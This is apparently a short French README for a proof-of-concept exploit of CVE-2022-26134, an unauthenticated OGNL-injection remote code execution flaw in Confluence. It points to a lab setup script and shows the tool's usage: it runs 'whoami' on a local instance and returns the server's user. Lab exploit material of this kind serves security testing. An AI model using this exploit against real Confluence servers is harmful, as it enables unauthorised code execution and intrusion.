
Exploit pour CVE-2022-26134 : exécution de code à distance avant authentification sur Confluence via injection OGNL
Encore un exploit dans l'univers OGNL
Confluence est un wiki d'entreprise basé sur le web développé par la société australienne Atlassian.
Le 2 juin 2022, Atlassian a publié un avis de sécurité concernant ses applications Confluence Server et Data Center, signalant une vulnérabilité critique d'exécution de code à distance sans authentification. Cette vulnérabilité d'injection OGNL permet à un utilisateur non authentifié d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.
Pour configurer votre laboratoire, exécutez start_conflunce.sh et suivez les instructions fournies ici.
$ ./confluence-exploit.py
usage: confluence-exploit.py [-h] -u URL
confluence-exploit.py: error: the following arguments are required: -u/--url
$ ./confluence-exploit.py -u http://127.0.0.1:8090
🔗 URL: http://127.0.0.1:8090
👉 (id): whoami
confluence